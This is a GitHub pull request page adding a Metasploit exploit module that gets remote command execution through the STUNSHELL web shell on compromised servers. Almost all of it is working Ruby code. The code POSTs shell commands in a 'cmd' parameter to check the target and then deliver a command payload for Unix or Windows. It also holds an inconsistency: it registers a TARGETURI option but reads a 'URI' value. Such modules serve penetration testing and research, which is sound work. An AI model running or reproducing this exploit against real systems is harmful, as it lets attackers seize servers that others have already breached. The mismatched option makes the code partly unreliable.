Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Added STUNSHELL webshell remote command execution module #1647

Merged
merged 4 commits into from Mar 28, 2013
Merged

Added STUNSHELL webshell remote command execution module #1647

Changes from all commits
Commits
Show all changes
4 commits
Select commit Hold shift + click to select a range
7e0b0ac
Added STUNSHELL webshell remote command execution module
Mar 24, 2013
e37fa3b
Added license information and tidied up code
Mar 25, 2013
cc92b54
Moved module and cleaned code
Mar 27, 2013
f14d5ba
Removed extra comma
Mar 27, 2013
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
96 changes: 96 additions & 0 deletions modules/exploits/multi/http/stunshell_exec.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,96 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})
super(update_info(info,
'Name' => 'STUNSHELL Web Shell Remote Code Execution',
'Description' => %q{
This module exploits unauthenticated versions of the "STUNSHELL" web shell. This
module works when safe mode is disabled on the web server. This shell is widely
used in automated RFI payloads.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bwall <bwall[at]openbwall.com>', # vuln discovery & msf module
],
'References' =>
[
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL'],
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=a4cd8ba05eb6ba7fb86dd66bed968007']
],
'Privileged' => false,
'Payload' =>
{
'Space' => 10000, # Value determined by web server's POST limits
'BadChars' => '',
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'Platform' => ['unix', 'win'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['stunshell / Unix', { 'Platform' => 'unix' } ],
['stunshell / Windows', { 'Platform' => 'win' } ]
],
'DisclosureDate' => 'Mar 23 2013',
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI',[true, "The path to the andalas_oku shell", "/IDC.php"]),
],self.class)
end

def check
uri = normalize_uri(datastore['URI'])
request_parameters = {
'method' => 'POST',
'uri' => uri,
'vars_post' =>
{
'cmd' => "echo 'andalas_oku test parameter'"
}
}
shell = send_request_cgi(request_parameters)
if (shell and shell.body =~ /andalas_oku test parameter/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end

def http_send_command(cmd)
uri = normalize_uri(datastore['URI'])
request_parameters = {
'method' => 'POST',
'uri' => uri,
'vars_post' =>
{
'cmd' => cmd
}
}
res = send_request_cgi(request_parameters)
if not (res and res.code == 200)
fail_with(Exploit::Failure::Unknown, 'Failed to execute the command.')
end
end

def exploit
http_send_command(payload.encoded)
end
end